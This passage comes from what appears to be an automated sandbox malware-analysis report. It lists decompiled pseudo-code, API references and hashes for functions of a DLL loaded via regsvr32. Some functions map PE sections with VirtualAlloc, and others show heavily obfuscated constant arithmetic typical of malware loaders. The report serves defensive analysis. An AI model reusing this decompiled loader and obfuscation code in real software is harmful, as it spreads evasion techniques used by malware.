					return 0;
				}
			}

0x1001a316
0x1001a31e
0x1001a323
0x1001a328
0x1001a32d
0x1001a330
0x1001a335
0x1001a35b
0x1001a35d
0x1001a35e
0x1001a337
0x1001a33c
0x1001a341
0x1001a344
0x00000000
0x1001a346
0x1001a34c
0x1001a352
0x00000000
0x1001a352
0x1001a344
0x1001a325
0x1001a325
0x1001a327
0x1001a327

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000,1001796A,00000001,?,?,00000001,?,?,10017AE8,00000001,?,?,1002F840,0000000C), ref: 1001A316
HeapDestroy.KERNEL32(?,?,00000001,?,?,10017AE8,00000001,?,?,1002F840,0000000C,10017BA2,?), ref: 1001A34C

Memory Dump Source

Source File: 00000002.00000002.651345596.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.651342620.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.651363188.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.651368974.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.651386401.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.651389703.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.651393113.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Heap$CreateDestroy
String ID:
API String ID: 3296620671-0
Opcode ID: 2498113e0f0cb93b929c98f8b50cab2ed5fb389832bb0c331937e648ce874443
Instruction ID: 8ebff57b685a6f4636b50d0b354dfd0ee4d70228ae444a146c3f0929ed30e208
Opcode Fuzzy Hash: 2498113e0f0cb93b929c98f8b50cab2ed5fb389832bb0c331937e648ce874443
Instruction Fuzzy Hash: 93E06D71A193569EFB10AB308C9972536F4EB46386F104826F911CD4A0F7B0C6C09A01

Uniqueness

Uniqueness Score: -1.00%

Function 10002010, Relevance: 2.6, APIs: 2, Instructions: 115
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E10002010(intOrPtr __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				void* _v12;
				long _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t76;
				void* _t127;

				_v28 = __ecx;
				_t3 = _a16 + 4; // 0x104e9
				_v20 =  *_t3;
				_t7 =  *_a16 + 0x14; // 0x4a8bb445
				_t9 = ( *_t7 & 0x0000ffff) + 0x18; // 0x10002c17
				_v24 =  *_a16 + _t9;
				_v8 = 0;
				while(1) {
					_t17 =  *_a16 + 6; // 0xe9000001
					if(_v8 >= ( *_t17 & 0x0000ffff)) {
						break;
					}
					if( *(_v24 + 0x10) != 0) {
						_t41 = _v24 + 0x14; // 0x4a8bb445
						_t43 = _v24 + 0x10; // 0x8b118bbc
						if(E10001FE0(_v28, _a8,  *_t41 +  *_t43) != 0) {
							_t47 = _v24 + 0x10; // 0x8b118bbc
							_t50 = _v24 + 0xc; // 0x4d8b0000
							_t76 = VirtualAlloc(_v20 +  *_t50,  *_t47, 0x1000, 4); // executed
							_v12 = _t76;
							if(_v12 != 0) {
								_t55 = _v24 + 0xc; // 0x4d8b0000
								_v12 = _v20 +  *_t55;
								_t58 = _v24 + 0x10; // 0x8b118bbc
								_t61 = _v24 + 0x14; // 0x4a8bb445
								E10001E60(_v12, _a4 +  *_t61,  *_t58);
								_t127 = _t127 + 0xc;
								 *((intOrPtr*)(_v24 + 8)) = _v12;
								L1:
								_v8 = _v8 + 1;
								_v24 = _v24 + 0x28;
								continue;
							}
							return 0;
						}
						return 0;
					}
					_v16 =  *((intOrPtr*)(_a12 + 0x38));
					if(_v16 <= 0) {
						L8:
						goto L1;
					}
					_t28 = _v24 + 0xc; // 0x4d8b0000
					_v12 = VirtualAlloc(_v20 +  *_t28, _v16, 0x1000, 4);
					if(_v12 != 0) {
						_t33 = _v24 + 0xc; // 0x4d8b0000
						_v12 = _v20 +  *_t33;
						 *((intOrPtr*)(_v24 + 8)) = _v12;
						E10001E10(_v12, 0, _v16);
						_t127 = _t127 + 0xc;
						goto L8;
					}
					return 0;
				}
				return 1;
			}

0x10002016
0x1000201c
0x1000201f
0x1000202c
0x10002030
0x10002034
0x10002037
0x10002052
0x10002057
0x1000205e
0x00000000
0x00000000
0x1000206b
0x100020d6
0x100020dc
0x100020ee
0x100020fe
0x10002108
0x1000210c
0x10002112
0x10002119
0x10002125
0x10002128
0x1000212e
0x10002138
0x10002140
0x10002145
0x1000214e
0x10002040
0x10002046
0x1000204f
0x00000000
0x1000204f
0x00000000
0x1000211b
0x00000000
0x100020f0
0x10002073
0x1000207a
0x100020ce
0x00000000
0x100020ce
0x1000208d
0x10002097
0x1000209e
0x100020ad
0x100020b0
0x100020b9
0x100020c6
0x100020cb
0x00000000
0x100020cb
0x00000000
0x100020a0
0x00000000

APIs

VirtualAlloc.KERNEL32(4D8B0000,00000000,00001000,00000004,?,10002BFF,00000000), ref: 10002091
VirtualAlloc.KERNELBASE(4D8B0000,8B118BBC,00001000,00000004,10008AC6,8B118BBC,?,10002BFF,00000000,10008AC6,?), ref: 1000210C

Memory Dump Source

Source File: 00000002.00000002.651345596.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.651342620.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.651363188.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.651368974.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.651386401.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.651389703.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.651393113.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 1f005b19e3c441fc20b6c29efe2afaeec2d3b558fdbd29b30d99f40439f16acf
Instruction ID: c265c5d024e1aaa08d03296b5d335ffe068feccc9d90f6e2fd2d76d71ec68577
Opcode Fuzzy Hash: 1f005b19e3c441fc20b6c29efe2afaeec2d3b558fdbd29b30d99f40439f16acf
Instruction Fuzzy Hash: 4E51DEB4A0020ADFDB04CF94C591AAEB7F1FF48344F208598E915AB355D771EE91CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 10008860, Relevance: 1.5, APIs: 1, Instructions: 41
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 94%

			E10008860(void* __eflags) {
				char* _v8;
				intOrPtr _v12;
				char _v16;
				char* _v20;
				void* __ebp;
				void* _t25;
				void* _t29;
				intOrPtr _t32;
				void* _t33;
				void* _t34;

				_v8 = E1001703B(_t25, _t29, _t33, _t34, 0x5f5e100);
				if(_v8 != 0) {
					_v12 = 0x5f5e100;
					_v16 = 0;
					_v20 = _v8;
					while(1) {
						__eflags = _v16 - 0x5f5e100;
						if(__eflags >= 0) {
							break;
						}
						 *_v20 = _v16;
						_v16 = _v16 + 1;
						_t32 = _v20 + 1;
						__eflags = _t32;
						_v20 = _t32;
					}
					_push(_v8); // executed
					E10016380(_t25, _t33, _t34, __eflags); // executed
					__eflags = _v16 - _v12;
					if(_v16 != _v12) {
						return 3;
					}
					return 0;
				}
				return 3;
			}

0x10008873
0x1000887a
0x10008883
0x1000888a
0x10008894
0x100088ab
0x100088ab
0x100088b2
0x00000000
0x00000000
0x100088ba
0x1000889f
0x100088a5
0x100088a5
0x100088a8
0x100088a8
0x100088c1
0x100088c2
0x100088cd
0x100088d0
0x00000000
0x100088d6
0x00000000
0x100088d2
0x00000000

APIs

_malloc.LIBCMT ref: 1000886B

Part of subcall function 1001703B: __FF_MSGBANNER.LIBCMT ref: 1001705E
Part of subcall function 1001703B: __NMSG_WRITE.LIBCMT ref: 10017065
Part of subcall function 1001703B: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,1001E73B,?,00000001,00000001,1001A4D3,00000018,1002F8C0,0000000C,1001A562,00000001), ref: 100170B3

Memory Dump Source

Source File: 00000002.00000002.651345596.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.651342620.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.651363188.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.651368974.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.651386401.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.651389703.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.651393113.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: AllocateHeap_malloc
String ID:
API String ID: 501242067-0
Opcode ID: 40bd655b06e48b04370c20bd75be719fcb86c010ff12dc3827a327f63544bac9
Instruction ID: 9e6909d06ecd8ca97a2f758cde8d66f904c366c92fb4d9c13ba1bad92c8ee0bf
Opcode Fuzzy Hash: 40bd655b06e48b04370c20bd75be719fcb86c010ff12dc3827a327f63544bac9
Instruction Fuzzy Hash: 9A0178B4D0424CEFEB00CFA4C8446AEBBB4FB04354F60C8A9D9516B349E735AB00DB81

Uniqueness

Uniqueness Score: -1.00%

Function 04B4D11A, Relevance: 1.5, APIs: 1, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E04B4D11A() {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _t39;

				_v24 = _v24 & 0x00000000;
				_v36 = 0x78f5c7;
				_v32 = 0xa12bb9;
				_v28 = 0x4eca09;
				_v8 = 0x8b256f;
				_v8 = _v8 << 0xb;
				_v8 = _v8 ^ 0x4a7d0011;
				_v8 = _v8 >> 9;
				_v8 = _v8 ^ 0x00073d60;
				_v20 = 0x1e549a;
				_v20 = _v20 + 0xffffad33;
				_v20 = _v20 ^ 0x00134b4f;
				_v16 = 0x8dd9dd;
				_v16 = _v16 << 3;
				_v16 = _v16 ^ 0x0460bc3c;
				_v12 = 0x358059;
				_v12 = _v12 + 0xb97b;
				_v12 = _v12 ^ 0x003502df;
				L04B3EB52(_t39, _t39, 0x83891850, 0x1c, 0xa2289af1);
				ExitProcess(0);
			}

0x04b4d120
0x04b4d124
0x04b4d12b
0x04b4d132
0x04b4d139
0x04b4d140
0x04b4d144
0x04b4d14b
0x04b4d14f
0x04b4d156
0x04b4d15d
0x04b4d164
0x04b4d16b
0x04b4d172
0x04b4d176
0x04b4d17d
0x04b4d184
0x04b4d18b
0x04b4d1ac
0x04b4d1b6

APIs

ExitProcess.KERNEL32(00000000), ref: 04B4D1B6

Memory Dump Source

Source File: 00000002.00000002.651296715.0000000004B31000.00000020.00000001.sdmp, Offset: 04B30000, based on PE: true

Associated: 00000002.00000002.651288624.0000000004B30000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.651316907.0000000004B56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4b30000_regsvr32.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 67c658d72cc930f45ab36e019061580956781c758de54a32820380ba4476f13f
Instruction ID: 604179753d78674af1b2b5d2b6f06c8b4a215cf689e87549784d143810b0c8df
Opcode Fuzzy Hash: 67c658d72cc930f45ab36e019061580956781c758de54a32820380ba4476f13f
Instruction Fuzzy Hash: DC1112B1C4030CEBDB44DFE5D94A6DEFBB0EB00709F108588D521B6240E3B89B489F90

Uniqueness

Uniqueness Score: -1.00%

Function 04B5061D, Relevance: 1.3, APIs: 1, Instructions: 52
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 79%

			E04B5061D(void* __ecx, WCHAR* __edx, WCHAR* _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				void* _t44;
				int _t53;
				WCHAR* _t56;

				_push(_a12);
				_t56 = __edx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E04B4FE29(_t44);
				_v24 = _v24 & 0x00000000;
				_v28 = 0xcd60b7;
				_v12 = 0x7257ab;
				_v12 = _v12 << 0xd;
				_v12 = _v12 + 0x8f69;
				_v12 = _v12 * 0x4c;
				_v12 = _v12 ^ 0x410f7a13;
				_v8 = 0x7b4696;
				_v8 = _v8 + 0xffff4950;
				_v8 = _v8 | 0x2a0f624b;
				_v8 = _v8 * 0x3a;
				_v8 = _v8 ^ 0xa0f3ec54;
				_v20 = 0x8a2161;
				_v20 = _v20 + 0xffff45ea;
				_v20 = _v20 ^ 0x1b6c7fa6;
				_v20 = _v20 ^ 0x1be8dede;
				_v16 = 0xdcc12a;
				_v16 = _v16 + 0xb9f4;
				_v16 = _v16 + 0xffffcfef;
				_v16 = _v16 ^ 0x00d9de04;
				L04B3EB52(__ecx, __ecx, 0xb7861dce, 0x3e, 0xa2289af1);
				_t53 = lstrcmpiW(_a4, _t56); // executed
				return _t53;
			}

0x04b50624
0x04b50627
0x04b50629
0x04b5062c
0x04b5062f
0x04b50630
0x04b50631
0x04b50636
0x04b5063d
0x04b50644
0x04b5064b
0x04b5064f
0x04b50667
0x04b5066a
0x04b50671
0x04b50678
0x04b5067f
0x04b5068b
0x04b5068e
0x04b50695
0x04b5069c
0x04b506a3
0x04b506aa
0x04b506b1
0x04b506b8
0x04b506bf
0x04b506c6
0x04b506d9
0x04b506e5
0x04b506eb

APIs

lstrcmpiW.KERNELBASE(410F7A13,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 04B506E5

Memory Dump Source

Source File: 00000002.00000002.651296715.0000000004B31000.00000020.00000001.sdmp, Offset: 04B30000, based on PE: true

Associated: 00000002.00000002.651288624.0000000004B30000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.651316907.0000000004B56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4b30000_regsvr32.jbxd

Yara matches

Similarity

API ID: lstrcmpi
String ID:
API String ID: 1586166983-0
Opcode ID: ef59b29d425997034e4fed527bf505b0074c5b4e8b9fa1c114afddacbc91d9b0
Instruction ID: 5f8c7c9dfbe2af4c2af49c1f997f95b39225c11755afaaa4de354e7ff21f5b97
Opcode Fuzzy Hash: ef59b29d425997034e4fed527bf505b0074c5b4e8b9fa1c114afddacbc91d9b0
Instruction Fuzzy Hash: B72110B1C01309ABCF14DFA9D9899DEBFB5FB20354F108298E529A7251E3B49B04CF90

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 04B38636, Relevance: 39.9, Strings: 31, Instructions: 1175
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E04B38636() {
				signed int _v12;
				signed int _v20;
				intOrPtr _v24;
				signed int _v44;
				char _v56;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				char _v100;
				char _v108;
				signed int _v144;
				char _v152;
				char _v160;
				char _v164;
				char _v168;
				char _v172;
				char _v176;
				signed int _v180;
				signed int _v184;
				unsigned int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				unsigned int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				unsigned int _v268;
				unsigned int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				signed int _v332;
				unsigned int _v336;
				signed int _v340;
				signed int _v344;
				signed int _v348;
				signed int _v352;
				signed int _v356;
				signed int _v360;
				signed int _v364;
				signed int _v368;
				signed int _v372;
				signed int _v376;
				signed int _v380;
				signed int _v384;
				signed int _v388;
				signed int _v392;
				signed int _v396;
				signed int _v400;
				signed int _v404;
				signed int _v408;
				signed int _v412;
				signed int _v416;
				signed int _v420;
				signed int _v424;
				signed int _v428;
				signed int _v432;
				signed int _v436;
				signed int _v440;
				signed int _v444;
				unsigned int _v448;
				signed int _v452;
				signed int _v456;
				signed int _v460;
				signed int _v464;
				signed int _v468;
				signed int _v472;
				signed int _v476;
				signed int _v480;
				signed int _v484;
				unsigned int _v488;
				signed int _v492;
				signed int _v496;
				signed int _v500;
				signed int _v504;
				signed int _v508;
				signed int _v512;
				signed int _v516;
				signed int _v520;
				signed int _v524;
				unsigned int _v528;
				signed int _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				unsigned int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				unsigned int _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				unsigned int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				signed int _v636;
				signed int _v640;
				signed int _v644;
				signed int _v648;
				signed int _v652;
				signed int _v656;
				signed int _v660;
				signed int _v664;
				signed int _v668;
				signed int _v672;
				unsigned int _v676;
				signed int _t1259;
				signed int _t1287;
				signed int _t1299;
				signed int _t1310;
				signed int _t1340;
				signed int _t1341;
				signed int _t1343;
				signed int _t1344;
				signed int _t1345;
				signed int _t1346;
				signed int _t1347;
				signed int _t1348;
				signed int _t1349;
				signed int _t1350;
				signed int _t1351;
				signed int _t1352;
				signed int _t1353;
				signed int _t1354;
				signed int _t1355;
				signed int _t1356;
				signed int _t1357;
				signed int _t1358;
				signed int _t1359;
				signed int _t1360;
				signed int _t1361;
				signed int _t1362;
				signed int _t1363;
				signed int _t1364;
				signed int _t1365;
				signed int _t1384;
				signed int _t1465;
				signed int _t1466;
				signed int _t1469;
				signed int _t1482;
				signed int _t1495;
				signed int _t1498;
				void* _t1500;
				void* _t1504;
				void* _t1505;
				void* _t1506;

				_t1500 = (_t1498 & 0xfffffff8) - 0x2a0;
				_v548 = 0x612d76;
				_v548 = _v548 + 0xffffb226;
				_v548 = _v548 ^ 0x25733830;
				_v548 = _v548 + 0x94f7;
				_v548 = _v548 ^ 0x25147da1;
				_v608 = 0x8e6410;
				_v608 = _v608 | 0x5e5673b6;
				_v608 = _v608 ^ 0x9913f1ef;
				_v608 = _v608 * 0x3a;
				_t1469 = 0xe6d4a04;
				_v608 = _v608 ^ 0x4490702a;
				_v332 = 0x40e6a4;
				_v332 = _v332 ^ 0x1ba14b53;
				_v332 = _v332 ^ 0x1be1adf7;
				_v388 = 0xd7ca30;
				_t1343 = 0x42;
				_v388 = _v388 / _t1343;
				_v388 = _v388 + 0x3798;
				_v388 = _v388 ^ 0x000f1b75;
				_v216 = 0xd7fc5;
				_v216 = _v216 >> 1;
				_v216 = _v216 ^ 0x0004b337;
				_v516 = 0x59f14d;
				_v516 = _v516 >> 0xf;
				_t1344 = 0x4a;
				_v516 = _v516 / _t1344;
				_v516 = _v516 << 0xb;
				_v516 = _v516 ^ 0x00046054;
				_v304 = 0xedc603;
				_v304 = _v304 + 0xffffc02b;
				_v304 = _v304 ^ 0x00efeb53;
				_v232 = 0x637592;
				_t1465 = 0x6f;
				_t1345 = 0x31;
				_v232 = _v232 * 0x71;
				_v232 = _v232 ^ 0x2bef3074;
				_v372 = 0x919268;
				_v372 = _v372 << 9;
				_v372 = _v372 + 0x904f;
				_v372 = _v372 ^ 0x2324b0cf;
				_v484 = 0x568eb3;
				_v484 = _v484 * 0x42;
				_v484 = _v484 / _t1465;
				_v484 = _v484 ^ 0x0034ded9;
				_v472 = 0x365886;
				_v472 = _v472 << 0xc;
				_v472 = _v472 + 0xffff5d21;
				_v472 = _v472 ^ 0x6583ba5b;
				_v436 = 0xdfd34b;
				_v436 = _v436 / _t1345;
				_v436 = _v436 | 0x191717ac;
				_v436 = _v436 ^ 0x1914e100;
				_v196 = 0xd88df0;
				_t1346 = 0x15;
				_v196 = _v196 / _t1346;
				_v196 = _v196 ^ 0x0009e710;
				_v356 = 0xb64ed2;
				_v356 = _v356 >> 0xd;
				_t1340 = 0x1c;
				_t1347 = 0x51;
				_v356 = _v356 * 0x63;
				_v356 = _v356 ^ 0x0006dcaa;
				_v336 = 0x65c0e5;
				_v336 = _v336 * 0x7a;
				_v336 = _v336 >> 3;
				_v336 = _v336 ^ 0x060f054d;
				_v492 = 0x31a1;
				_v492 = _v492 ^ 0x5b528d22;
				_v492 = _v492 << 5;
				_v492 = _v492 ^ 0x6a59b43c;
				_v652 = 0x40a60;
				_v652 = _v652 | 0x6178721b;
				_v652 = _v652 + 0x8e9b;
				_v652 = _v652 / _t1340;
				_v652 = _v652 ^ 0x037a42dd;
				_v272 = 0xf0169f;
				_v272 = _v272 >> 5;
				_v272 = _v272 ^ 0x0004695a;
				_v528 = 0x24fae7;
				_v528 = _v528 ^ 0xfec3499d;
				_v528 = _v528 << 0xf;
				_v528 = _v528 >> 0xc;
				_v528 = _v528 ^ 0x0001af4c;
				_v188 = 0x9b8757;
				_v188 = _v188 >> 4;
				_v188 = _v188 ^ 0x000b2d6a;
				_v256 = 0x948fd;
				_v256 = _v256 ^ 0xf30bafdb;
				_v256 = _v256 ^ 0xf30b6e1f;
				_v464 = 0x93fe09;
				_v464 = _v464 / _t1347;
				_t1348 = 0x23;
				_v464 = _v464 * 0x7a;
				_v464 = _v464 ^ 0x00d327e8;
				_v648 = 0xd540cd;
				_v648 = _v648 * 0x5c;
				_v648 = _v648 >> 0xb;
				_v648 = _v648 / _t1348;
				_v648 = _v648 ^ 0x0005d45a;
				_v540 = 0x2acc1;
				_v540 = _v540 >> 7;
				_v540 = _v540 << 0x10;
				_t1349 = 0x59;
				_v540 = _v540 / _t1349;
				_v540 = _v540 ^ 0x000fef6f;
				_v264 = 0xfe7d93;
				_v264 = _v264 ^ 0x4bd787a7;
				_v264 = _v264 ^ 0x4b22b45d;
				_v208 = 0x23d5c9;
				_v208 = _v208 ^ 0x8f5a829d;
				_v208 = _v208 ^ 0x8f7555ae;
				_v524 = 0x2aaed2;
				_v524 = _v524 | 0x9661325e;
				_t1495 = 0x5c;
				_v524 = _v524 / _t1495;
				_v524 = _v524 * 0x63;
				_v524 = _v524 ^ 0xa1d330ca;
				_v612 = 0x173148;
				_v612 = _v612 >> 5;
				_v612 = _v612 + 0x14e7;
				_v612 = _v612 / _t1349;
				_v612 = _v612 ^ 0x0000773b;
				_v620 = 0xe48585;
				_v620 = _v620 << 0x10;
				_v620 = _v620 * 0x32;
				_v620 = _v620 >> 7;
				_v620 = _v620 ^ 0x0028030c;
				_v500 = 0xfd3bdc;
				_v500 = _v500 << 0xa;
				_v500 = _v500 ^ 0xf4e13163;
				_v520 = 0xe4fc5f;
				_v520 = _v520 + 0xa13e;
				_v520 = _v520 + 0xffff7828;
				_v520 = _v520 ^ 0x4d340404;
				_v520 = _v520 ^ 0x4dd63175;
				_v360 = 0x9532ce;
				_v360 = _v360 ^ 0xdad74cca;
				_v360 = _v360 | 0x8468d9e2;
				_v360 = _v360 ^ 0xde69f572;
				_v604 = 0x3a7c91;
				_v604 = _v604 | 0x10f1a45d;
				_v604 = _v604 + 0xffff6d1e;
				_v604 = _v604 | 0x776d764a;
				_v604 = _v604 ^ 0x77f7c5e5;
				_v212 = 0x6e3f57;
				_t279 =  &_v212; // 0x6e3f57
				_v212 =  *_t279 * 3;
				_v212 = _v212 ^ 0x01468193;
				_v220 = 0x58f789;
				_v220 = _v220 << 5;
				_v220 = _v220 ^ 0x0b1ef21b;
				_v236 = 0x737654;
				_v236 = _v236 + 0xe2b4;
				_v236 = _v236 ^ 0x0073a4da;
				_v416 = 0xc8c3a8;
				_v416 = _v416 ^ 0x4478b906;
				_v416 = _v416 * 0xc;
				_v416 = _v416 ^ 0x384ff3ff;
				_v576 = 0x407f47;
				_v576 = _v576 + 0x1a0d;
				_v576 = _v576 * 0x63;
				_v576 = _v576 << 2;
				_v576 = _v576 ^ 0x63e80fef;
				_v228 = 0x9b4b6;
				_v228 = _v228 + 0xffffd2d4;
				_v228 = _v228 ^ 0x000d2243;
				_v552 = 0xb96e33;
				_v552 = _v552 + 0x4381;
				_v552 = _v552 * 0xf;
				_v552 = _v552 + 0xffffbee9;
				_v552 = _v552 ^ 0x0ae545e5;
				_v560 = 0xe19e88;
				_v560 = _v560 | 0xc222c343;
				_v560 = _v560 / _t1465;
				_v560 = _v560 + 0x567c;
				_v560 = _v560 ^ 0x01c941bb;
				_v568 = 0xf463df;
				_v568 = _v568 | 0x401122c6;
				_v568 = _v568 >> 3;
				_v568 = _v568 | 0xf3373c61;
				_v568 = _v568 ^ 0xfb38c632;
				_v392 = 0xa88994;
				_v392 = _v392 >> 2;
				_v392 = _v392 + 0xfffffc92;
				_v392 = _v392 ^ 0x002883f3;
				_v544 = 0x16009;
				_v544 = _v544 ^ 0x700f0ae7;
				_v544 = _v544 << 0xd;
				_v544 = _v544 + 0xffffa581;
				_v544 = _v544 ^ 0xcd57c12d;
				_v400 = 0x4e3251;
				_v400 = _v400 << 0xd;
				_v400 = _v400 << 0xb;
				_v400 = _v400 ^ 0x510ef6f0;
				_v408 = 0xce49b4;
				_v408 = _v408 / _t1340;
				_v408 = _v408 | 0xa9ee0ad6;
				_v408 = _v408 ^ 0xa9ed29cd;
				_v368 = 0xfab4ff;
				_v368 = _v368 ^ 0x8bb4f731;
				_v368 = _v368 + 0x4788;
				_v368 = _v368 ^ 0x8b4dbddc;
				_v376 = 0x3b857d;
				_v376 = _v376 + 0xd8be;
				_v376 = _v376 ^ 0x0c7e0de1;
				_v376 = _v376 ^ 0x0c4b703c;
				_v384 = 0x702b67;
				_v384 = _v384 + 0x7016;
				_v384 = _v384 | 0xc6195e9d;
				_v384 = _v384 ^ 0xc67058d5;
				_v536 = 0xd092b2;
				_v536 = _v536 + 0xffff63c4;
				_v536 = _v536 | 0x81cb3080;
				_v536 = _v536 ^ 0x4ecdb7ae;
				_v536 = _v536 ^ 0xcf0bdc69;
				_v248 = 0xf8c39f;
				_v248 = _v248 | 0x0e89bf31;
				_v248 = _v248 ^ 0x0ef3b328;
				_v556 = 0x54f798;
				_v556 = _v556 >> 2;
				_v556 = _v556 ^ 0xd52f7ed0;
				_v556 = _v556 >> 6;
				_v556 = _v556 ^ 0x03531d7d;
				_v672 = 0xe1b7ad;
				_t1350 = 0x7a;
				_v672 = _v672 / _t1350;
				_v672 = _v672 << 0xc;
				_t1351 = 0xa;
				_v672 = _v672 / _t1351;
				_v672 = _v672 ^ 0x02f2c9f1;
				_v676 = 0xf0d76a;
				_v676 = _v676 >> 3;
				_v676 = _v676 + 0xffffb109;
				_v676 = _v676 >> 4;
				_v676 = _v676 ^ 0x0006f826;
				_v200 = 0xd1b71d;
				_t1352 = 0x7c;
				_v200 = _v200 / _t1352;
				_v200 = _v200 ^ 0x0006a6d0;
				_v596 = 0x496d6a;
				_t459 =  &_v596; // 0x496d6a
				_v596 =  *_t459 * 0x6b;
				_v596 = _v596 + 0xbb66;
				_v596 = _v596 + 0xffff602d;
				_v596 = _v596 ^ 0x1ebb8efb;
				_v404 = 0xf3863;
				_v404 = _v404 >> 0xe;
				_t1353 = 0x2a;
				_v404 = _v404 / _t1353;
				_v404 = _v404 ^ 0x00094758;
				_v476 = 0x611fd8;
				_v476 = _v476 | 0xb878f5dc;
				_v476 = _v476 + 0xad5b;
				_v476 = _v476 ^ 0xb87809fa;
				_v460 = 0xcf43a7;
				_v460 = _v460 ^ 0xdec9221b;
				_v460 = _v460 ^ 0xf00bdbd0;
				_v460 = _v460 ^ 0x2e089b39;
				_v340 = 0x6e2519;
				_v340 = _v340 + 0xffff23bc;
				_v340 = _v340 + 0xffffab38;
				_v340 = _v340 ^ 0x00658e81;
				_v468 = 0x6e95b3;
				_v468 = _v468 | 0xe42d871f;
				_v468 = _v468 + 0xffff0334;
				_v468 = _v468 ^ 0xe4661c95;
				_v184 = 0x976a3e;
				_v184 = _v184 >> 2;
				_v184 = _v184 ^ 0x002fb3e7;
				_v640 = 0xf929b2;
				_v640 = _v640 >> 4;
				_v640 = _v640 + 0x46ec;
				_t1354 = 0x4e;
				_v640 = _v640 * 0x14;
				_v640 = _v640 ^ 0x013b9ce5;
				_v288 = 0x293a87;
				_v288 = _v288 * 0x1a;
				_v288 = _v288 ^ 0x042f344b;
				_v300 = 0x77766c;
				_v300 = _v300 + 0xffff170c;
				_v300 = _v300 ^ 0x007d4cee;
				_v308 = 0x8e9aa4;
				_v308 = _v308 / _t1354;
				_v308 = _v308 ^ 0x00052c4e;
				_v456 = 0x218ab6;
				_v456 = _v456 / _t1340;
				_v456 = _v456 << 8;
				_v456 = _v456 ^ 0x0138796e;
				_v632 = 0x66de5e;
				_v632 = _v632 + 0xffff10e7;
				_v632 = _v632 << 8;
				_v632 = _v632 + 0xffffeb43;
				_v632 = _v632 ^ 0x65e84e4c;
				_v412 = 0x242a03;
				_v412 = _v412 << 3;
				_v412 = _v412 >> 4;
				_v412 = _v412 ^ 0x00169ab3;
				_v580 = 0x395796;
				_v580 = _v580 << 7;
				_v580 = _v580 >> 9;
				_v580 = _v580 + 0xb065;
